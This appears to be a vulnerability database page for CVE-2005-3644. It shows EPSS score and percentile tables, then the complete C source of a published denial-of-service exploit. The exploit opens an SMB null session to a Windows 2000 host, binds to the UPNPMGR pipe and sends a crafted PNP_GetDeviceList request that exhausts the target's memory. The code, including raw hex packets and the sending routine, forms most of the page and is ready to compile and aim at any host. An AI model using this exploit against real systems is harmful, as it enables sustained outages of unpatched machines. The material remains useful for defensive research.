CVE-2005-3644 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	44.55%	–	–
2023-03-12	–	–	–	23.51%	–
2023-04-16	–	–	–	29.2%	–
2023-06-04	–	–	–	33.02%	–
2023-07-30	–	–	–	38.76%	–
2023-10-08	–	–	–	47.86%	–
2024-02-11	–	–	–	43.52%	–
2024-03-10	–	–	–	3%	–
2024-06-02	–	–	–	3%	–
2024-10-27	–	–	–	28.1%	–
2024-12-22	–	–	–	27.74%	–
2025-01-19	–	–	–	27.74%	–
2025-03-18	–	–	–	–	65.74%
2025-03-30	–	–	–	–	70.26%
2025-03-30	–	–	–	–	70.26,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	98%
2023-03-12	96%
2023-04-16	96%
2023-06-04	96%
2023-07-30	97%
2023-10-08	97%
2024-02-11	97%
2024-03-10	97%
2024-06-02	97%
2024-10-27	97%
2024-12-22	97%
2025-01-19	97%
2025-03-18	98%
2025-03-30	99%
2025-03-30	99%

/* * Author: Winny Thomas * Nevis Labs, Pune, INDIA * * Details: * While working on the exploit for MS05-047 i came across a condition where * a specially crafted request to upnp_getdevicelist would cause * services.exe to consume memory to a point where the target machines virtual * memory gets exhausted. This exploit is NOT similar to the MS05-047 exploit i * published earlier. The earlier one trashed the EIP of the target causing a * crash in services.exe and eventually brought down the system to shut down. * However in this exploit (again a DOS) the virtual memory is consumed to a * point where desktop requests (like clicking "My Computer"), HTTP requests, * SMB requests etc does not get serviced for sometime. After sometime the * memory usage comes down and the target system would work as normal. However * this code when continuosly executed against a target leads to a sustained * DOS attack. * Start the task manager on the target system and run this code against the * target and watch the virtual memory usage shoot up. * * I used windbg to break on calls to upnp_getdevicelist when running this code. * However even before the break point is hit the system becomes unresponsive. * Strangely though changing the operation number in the DCERPC request to * something else other than 0xa (upnp_getdevicelist) will make the DOS attempt * fail. Perhaps changing the payload a little bit, so that the underlying * demarshalling routines dont return an error, might reproduce this effect * for other UPNP operations as well. * * TESTED ON: Windows 2000 server SP0, SP2 and SP3. I have not tested this on * any of the above machines with the recent hot fixes for UPNP. * * Note: This code is for educational/testing purposes by authorized persons on networks systems setup for such purposes * The author shall bear no responsibility for any damage caused by using this code. */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> unsigned short ProcessID = 0; unsigned short TID = 0; unsigned short UserID = 0; unsigned short FID = 0; char peer0_0[] = "\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F" "\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02" "\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F" "\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70" "\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30" "\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54" "\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00" ; char peer0_1[] = "\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00" "\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E" "\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00" "\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00" "\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00" "\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00" "\x2E\x00\x30\x00\x00\x00\x00\x00"; char peer0_1_2[] = "\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00" "\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E" "\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46" "\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40" "\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40" "\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48" "\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3" "\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00" "\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00" "\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00" "\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00" "\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00"; char peer0_2[] = "\x00\x00\x00\x58\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2D\x00\x00"; char peer0_3[] = "\x00\x00\x00\x66\xff\x53\x4d\x42\xa2\x00\x00\x00\x00\x18\x07\xc8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" "\x00\x08\x40\x00\x18\xff\x00\xde\xde\x00\x10\x00\x16\x00\x00\x00" "\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00" "\x02\x00\x00\x00\x03\x13\x00\x00\x5c\x00\x62\x00\x72\x00\x6f\x00" "\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00"; char peer0_4[] = "\x00\x00\x00\x9A\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x08\x01\xC0" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xFF\xFE" "\x00\x08\x01\x00\x10\x00\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x48\x00\x52\x00\x02" "\x00\x26\x00\x00\x40\x57\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00" "\x45\x00\x5C\x00\x00\x00\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00" "\x00\x00\x00\x00\x00\x00\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00" "\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11\x8F\x69" "\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C" "\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00"; char peer0_5[] = //NETBIOS Fields //============== "\x00" //Message type "\x00\x00\x80" //Payload length C //SMB Fields //========== //SMB Header "\xFF\x53\x4D\x42\x2F\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x40\x6D\x4E\xF4\x8C\x6E\x13\x7B\x00\x00\x00\x08\xFF\xFE" "\x00\x08\x00\x01" //Write ANDX Request fields "\x0E" //Word count "\xFF\x00\xDE\xDE\x00\x40\x00\x00\x00\x00\xFF" "\xFF\xFF\xFF\x08\x00" "\x40\x00" //Remaining C "\x00\x00" //Data Length High "\x40\x00" //Data Length Low C "\x40\x00" //Data Offset C "\x00\x00\x00\x00" //High Offset "\x41\x00" //Byte count C "\xEE"//Padding //DCE RPC Request field //===================== "\x05\x00\x00\x03\x10\x00\x00\x00" "\x40\x00" //Frag Length "\x00\x00" //Auth Length "\x8D\x00\x00\x00" //Call Id "\x28\x00\x00\x00" //Alloc HINT C "\x00\x00" //Context Id "\x0A\x00" //OpNum; 10 in our case for PNP_GetDeviceList //DATA for GetDeviceList "\x00\x00\x00\x00" "\x10\x10\x10\x10" //This is what kills the target. \x00\x00\x00\x00 is safe "\x48\x54\x52\x45\x45\x5C\x52\x4F\x4F\x54\x5C" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00"; void send_packet(int sock, char *payload, int size, char *type) { int ntrans, ret; memcpy(&payload[30], &ProcessID, 2); if (UserID) memcpy(&payload[32], &UserID, 2); if (TID) memcpy(&payload[28], &TID, 2); if (strcmp(type, "Sending DCE RPC Bind UPNPMGR request") == 0) { memcpy(&payload[67], &FID, 2); } if (strcmp(type, "UPNPMGR upnp_getdevicelist request") == 0) { memcpy(&payload[41], &FID, 2); } printf("[*] %s: ", type); fflush(stdout); ntrans = send(sock, payload, size, 0); if (ntrans < 0) { printf("\033[0;31mFailed\033[0;39m\n\n"); exit(-1); } } void get_response(int sock, char *type) { int ret; char response[1496]; ret = recv(sock, response, 1496, 0); if (strcmp(type, "Null Session request 1") != 0) { if ((ret < 0 || response[9] != 0)) { printf("\033[0;31mError in %s response\033[0;39m\n\n", type); exit(-1); } } if (strcmp(type, "Null Session request 1") == 0) { UserID = *(unsigned short *)&response[32]; } if (strcmp(type, "Tree Connect") == 0) { TID = *(unsigned short *)&response[28]; } if (strcmp(type, "NT Creat AndX") == 0) { FID = *(unsigned short *)&response[42]; } if (strcmp(type, "UPNPMGR upnp_getdevicelist") == 0) { if((unsigned long)response[88] != 0) { printf("\033[0;31mnca_s_fault_ndr\033[0;39m\n\n"); exit(-1); } } printf("\033[0;32mOK\033[0;39m\n"); } void banner() { printf("\n\n\033[0;31m\t!------------------------------------------!\n\033[0;39m"); printf("\033[0;31m\t Memory leak when sending upnp_getdevicelist request\n\033[0;39m"); printf("\033[0;31m\t Coded by: \033[0;34m Winny Thomas :-)\n\033[0;39m"); printf("\033[0;34m\t\t NevisLabs\n\033[0;39m"); printf("\033[0;34m\t\t Nevis Networks, Pune, INDIA\n\033[0;39m"); printf("\033[0;31m\t!------------------------------------------!\n\n\033[0;39m"); } char *setup_tCon(char *UNC, char *ptr) { int pindex = 0, uindex = 0, len; len = strlen(UNC); while (uindex < len) { if ((pindex % 2) != 0) { ptr[pindex] = '\x00'; pindex++; continue; } ptr[pindex] = UNC[uindex]; uindex++; pindex++; } ptr[pindex] = '\x00'; pindex++; ptr[pindex] = '\x00'; pindex++; ptr[pindex] = '\x00'; pindex++; ptr[pindex] = 'I'; pindex++; ptr[pindex] = 'P'; pindex++; ptr[pindex] ='C'; pindex++; ptr[pindex] = '\x00'; pindex++; ptr[pindex] = '\x00'; pindex++; } int main(int argc, char *argv[]) { struct sockaddr_in target; struct hostent *host; char UNC[50], tConXpacket[150], *temp, targetIP[20]; int sockfd; int ret, templen; system("clear"); banner(); if (argc < 2) { printf("Usage: %s <host name|ip address>\n\n", argv[0]); exit(-1); } srand(time(NULL)); ProcessID = rand(); printf("[*] Resolving %s: ", argv[1]); host = gethostbyname(argv[1]); if (!host) { printf("\033[0;31mFailed\033[0;39m\n"); exit(-1); } printf("\033[0;32mOK\033[0;39m\n"); target.sin_family = AF_INET; target.sin_addr = *(struct in_addr *)host->h_addr; target.sin_port = htons(445); sprintf(targetIP, "%s", inet_ntoa(target.sin_addr)); sockfd = socket(AF_INET, SOCK_STREAM, 0); ret = connect(sockfd, (struct sockaddr *)&target, sizeof(target)); if (ret < 0) { perror("Connect"); exit(-1); } send_packet(sockfd, peer0_0, sizeof(peer0_0) -1, "Sending SMB Negotiate request"); get_response(sockfd, "SMB Negotiate"); send_packet(sockfd, peer0_1, sizeof(peer0_1) -1, "Sending Null Session request"); get_response(sockfd, "Null Session request 1"); send_packet(sockfd, peer0_1_2, sizeof(peer0_1_2) -1, "Sending Null Session request"); get_response(sockfd, "Null Session request 2"); bzero(tConXpacket, 150); temp = tConXpacket; memcpy(tConXpacket, peer0_2, sizeof(peer0_2)); temp += sizeof(peer0_2) -1; sprintf(UNC, "\\\\%s\\IPC$", targetIP); setup_tCon(UNC, temp); templen = (strlen(UNC)*2) +9; tConXpacket[3] = 43 + templen; templen -= 2; memcpy((unsigned long *)&tConXpacket[45], &templen, 1); send_packet(sockfd, tConXpacket, sizeof(peer0_2) +templen, "Sending Tree Connect request"); get_response(sockfd, "Tree Connect"); send_packet(sockfd, peer0_3, sizeof(peer0_3) -1, "Sending NT Creat AndX request"); get_response(sockfd, "NT Creat AndX"); send_packet(sockfd, peer0_4, sizeof(peer0_4) -1, "Sending DCE RPC Bind UPNPMGR request"); get_response(sockfd, "DCE RPC Bind UPNPMGR"); send_packet(sockfd, peer0_5, sizeof(peer0_5) -1, "UPNPMGR upnp_getdevicelist request"); get_response(sockfd, "UPNPMGR upnp_getdevicelist"); close(sockfd); } // milw0rm.com [2005-11-16]